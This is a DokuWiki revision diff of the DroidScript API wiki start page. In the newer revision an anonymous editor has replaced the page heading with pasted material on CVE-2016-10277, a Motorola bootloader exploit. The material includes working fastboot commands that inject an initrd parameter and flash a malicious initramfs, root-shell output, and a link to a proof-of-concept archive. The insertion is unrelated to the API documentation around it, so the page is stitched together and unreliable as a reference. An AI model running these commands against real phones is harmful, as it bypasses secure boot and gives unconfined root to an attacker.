DroidScript Wiki

User Tools

Site Tools

Trace:
built_in:start

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revision Previous revision
Next revision 		Previous revision
Next revision Both sides next revision
built_in:start [2015/03/22 08:38]
octazid [Table] 		built_in:start [2018/12/30 13:41]
182.1.63.175 [Built-in features - DroidScript API]
Line 1: Line 1:
-======Built-in features - DroidScript API====== +Sources: 
 +https://alephsecurity.com/2017/08/30/untethered-initroot/ 
 +https://github.com/alephsecurity/initroot
  
 +initroot: Motorola Bootloader Kernel Cmdline Injection Secure Boot & Device Locking Bypass (CVE-2016-10277)
  
 +By Roee Hay / Aleph Research, HCL Technologies
 +
 +Recap of the Vulnerability and the Tethered-jailbreak
 +
 +1. Vulnerable versions of the Motorola Android Bootloader (ABOOT) allow for kernel command-line injection.
 +2. Using a proprietary fastboot OEM command, only available in the Motorola ABOOT, we can inject, through USB, a parameter named initrd which allows us to force the Linux kernel to populate initramfs into rootfs from a specified physical address.
 +3. We can abuse the ABOOT download functionality in order to place our own malicious initramfs at a known physical address, named SCRATCH_ADDR (see here for a list of devices).
 +4. Exploiting the vulnerability allows the adversary to gain unconfined root shell.
 +5. Since the initramfs payload is injected into RAM by the adversary, the vulnerability must be re-exploited on every reboot.
 +For example, here is a successful run of the exploit on cedric (Moto G5)
 +
 +$ fastboot oem config fsg-id "a initrd=0xA2100000,1588598" 
 +$ fastboot flash aleph initroot-cedric.cpio.gz 
 +$ fastboot continue
 +
 +$ adb shell 
 +cedric:/ # id
 +uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:kernel:s0
 +cedric:/ # getenforce
 +Permissive
 +cedric:/ #
 +
 +
 +Proof of Concept:
 +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42601.zip
 +
 +            
 ====Links==== ====Links====
 ^App and Layout^ ^App and Layout^
Line 20: Line 50:
 | [[built_in:downloader|Downloader]]                         | | [[built_in:downloader|Downloader]]                         |
 | [[built_in:email|Email control]]                           | | [[built_in:email|Email control]]                           |
 +| [[built_in:create_file|File control]]                      |
 | [[built_in:glview|GLView control]]                         | | [[built_in:glview|GLView control]]                         |
 | [[built_in:images|Image control]]                          | | [[built_in:images|Image control]]                          |
built_in/start.txt · Last modified: 2018/12/31 01:07 (external edit)

Page Tools

Except where otherwise noted, content on this wiki is licensed under the following license: CC Attribution-Share Alike 4.0 International
CC Attribution-Share Alike 4.0 International Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki